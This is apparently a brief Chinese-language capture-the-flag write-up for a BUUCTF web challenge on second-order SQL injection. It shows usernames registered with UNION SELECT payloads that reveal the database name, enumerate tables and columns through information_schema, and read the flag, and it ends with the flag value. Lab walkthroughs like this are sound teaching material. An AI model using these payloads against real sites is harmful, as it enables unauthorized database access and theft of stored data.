buuctf-web-October 2019 Twice SQL Injection1

看这题目，二次注入，打开环境

到注册界面随便注册一个用户后登录

登录后界面如下

测试输入1，回显1

输入测试2'

回显2\'

重新注册账号为admin' union select database()#，密码123456(此处此方法无用，账号必须是数字)

注册账号为1' union select database()#,密码为123

重新登录，发现显示数据库为ctftraining

随后就是sql注入常规操作，爆库爆表爆字段读内容,继续注册账户名带注入语句的用户

1' union select group_concat(table_name) from information_schema.tables where table_schema=database()#

1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#

1' union select flag from flag #

得到flag

flag{832f6091-35b5-48e6-aa88-fe19ddb700a5}